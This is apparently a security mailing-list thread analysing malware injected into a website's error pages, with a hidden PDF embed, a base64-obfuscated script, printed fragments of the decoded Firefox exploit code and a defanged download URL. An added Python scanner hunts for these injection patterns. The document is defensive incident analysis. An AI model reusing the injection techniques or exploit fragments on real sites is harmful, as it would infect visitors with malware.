RE: Malicious code just found on web server

FWIW, resolves to, not

I took a quick look at the code... formatted it in a pastebin here:

That javascript writes this to the page (URL obscured):
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.


Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.

We've been seeing a lot of this lately.

- - ferg

Yes, definitely malicious:

- - ferg

You beat me to it.


Nice, bad code is actually on all of the error (404) pages for the site as
well as some other php pages.
The code is actually a base64 obfuscation technique to hide the actual
attack code.
Once decoded, the code attempts multiple attacks to try and get the victim to
download an executable.


Virustotal results (3/40)

Also this code appears to be trying to exploit specific browser types
(Chrome and Mozilla in particular) as can be seen from this code snippet of
the decode.

(Commented out each line just in case someone has a browser that will try
and render this)

//aaa_2626aKiupwzqp.setAttribute("style", "display: none; -moz-binding:
//var aaa_2626aLiupwzqp =,
//var aaa_2626aMiupwzqp = aaa_2626aLiupwzqp("return function(C){ var
//ithPath('c:\\" + aaa_2626aHiupwzqp + ".exe'); return file; }")();
//window.file = aaa_2626aMiupwzqp(Components);
//var aaa_2626aNiupwzqp = aaa_2626aLiupwzqp("return function(C){ return
//window.process = aaa_2626aNiupwzqp(Components);
//var aaa_2626aOiupwzqp = aaa_2626aLiupwzqp("return function(C,file){
return persist; }")();
//window.persist = aaa_2626aOiupwzqp(Components,window.file);
//window.getState = aaa_2626aLiupwzqp("return function(persist) { return
persist.currentState; }")();
//window.processRun = aaa_2626aLiupwzqp("return function(process,file) {
process.init(file);,[],0); }")();

Also attempts to download a hostile PDF file from a subdirectory underneath
this one which was created with a demo copy of Foxit.

Version 2.321001 (possibly)
Created: 2009-02-19 1448hrs (-2 timezone)

There appear to be several other attacks within this code. I can upload or
update this thread if you are interested in the other attacks.
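The two injection patterns reported in this thread, a near-invisible <embed> pointing at a PDF and a base64-wrapped script whose decoded form carries Firefox/XPCOM indicators (-moz-binding, Components, a .exe drop path, process.init), are easy to sweep for across a web root. The scanner below is an added example written for this page, not code posted by anyone in the thread; the sample 404 page it scans is constructed, and the base64 blob in it wraps a harmless stand-in string that only contains the indicator words, not the real payload. It generalizes slightly beyond the thread by also checking <iframe> and <object> tags for the same zero-size/display:none hiding trick.

```python
"""Sweep HTML/PHP templates for hidden embeds and base64-wrapped scripts.

Added example (not from the thread). Sample input is constructed inline.
"""
import base64
import re
from dataclasses import dataclass

# Hiding trick from the thread: width/height of 0 or 1 px, or display:none.
TAG_RE = re.compile(r'<(embed|iframe|object)\b([^>]*)>', re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')
# Long unbroken base64 runs are the obfuscation wrapper the thread describes.
B64_RE = re.compile(r'[A-Za-z0-9+/]{40,}={0,2}')
# Strings the thread's decoded snippet contained (coarse heuristic).
INDICATORS = ('-moz-binding', 'Components', '.exe', 'process.init')

# Constructed stand-in for the decoded payload: indicator words only.
FAKE_DECODED = (
    'var x = document.createElement("iframe");'
    'x.setAttribute("style", "display: none; -moz-binding: url(...)");'
    'window.file = f(Components); // drop path c:/name.exe ; process.init(file)'
)
SAMPLE_404 = """<html><body>
<h1>404 Not Found</h1>
<script>eval(atob("%s"));</script>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
<embed src="poster.pdf" width="600" height="400"></embed>
</body></html>
""" % base64.b64encode(FAKE_DECODED.encode()).decode()


@dataclass
class Finding:
    kind: str
    detail: str


def _attrs(raw):
    """Parse tag attributes into a lowercase-keyed dict."""
    out = {}
    for name, dq, sq, bare in ATTR_RE.findall(raw):
        out[name.lower()] = dq or sq or bare
    return out


def hidden_embeds(html):
    """Return (tag, src) for embed/iframe/object tags hidden by size or style."""
    hits = []
    for m in TAG_RE.finditer(html):
        a = _attrs(m.group(2))
        tiny = a.get('width', '') in ('0', '1') or a.get('height', '') in ('0', '1')
        style = a.get('style', '').replace(' ', '').lower()
        if tiny or 'display:none' in style:
            hits.append((m.group(1).lower(), a.get('src', '')))
    return hits


def decoded_blobs(html):
    """Decode every long base64 run in the page; return (blob, text) pairs."""
    out = []
    for m in B64_RE.finditer(html):
        blob = m.group(0)
        try:
            raw = base64.b64decode(blob + '=' * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        out.append((blob, raw.decode('utf-8', errors='replace')))
    return out


def indicators_in(text):
    """Indicator strings present in decoded text (case-insensitive)."""
    low = text.lower()
    return [i for i in INDICATORS if i.lower() in low]


def scan_page(html):
    """Run both checks over one page and return the findings in order."""
    findings = []
    for tag, src in hidden_embeds(html):
        findings.append(Finding('hidden_embed', f'<{tag}> src={src!r}'))
    for blob, text in decoded_blobs(html):
        hits = indicators_in(text)
        if hits:
            findings.append(Finding('obfuscated_script',
                                    f'base64 ({len(blob)} chars) decodes to script with {hits}'))
    return findings


if __name__ == '__main__':
    for f in scan_page(SAMPLE_404):
        print(f.kind, '-', f.detail)
```

Run it over every .php/.html file under the document root (the thread notes the injection sat on every 404 page and several other PHP pages); any hidden_embed hit naming a PDF, or any decoded blob carrying the indicators, is a file to pull and compare against a clean copy.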


Not only is that .pdf malicious, when "executed" it also fetches additional
malware from:

hxxp:// /1.1.1/load.php

If that host is not in your block list, it should be -- known purveyor of

This is in addition to the other malicious URLs mentioned in this thread.

- - ferg

I noticed that in the PDF file but as the domain doesn't seem to have
resolution I didn't mention it.


WHOIS information on the domain

Whois Record

domain: TEST1.RU
org: Center of Effective Technologies and Systems CETIS
phone: +7 4957711654
fax-no: +7 4957879251
e-mail: <>
e-mail: <>
registrar: REGRU-REG-RIPN
created: 2001.03.30
paid-till: 2010.04.03
source: TC-RIPN

Registry Data Created: 2001-03-30 Expires: 2010-04-03 Whois Server:
Server Data Domain Status: Registered And No Website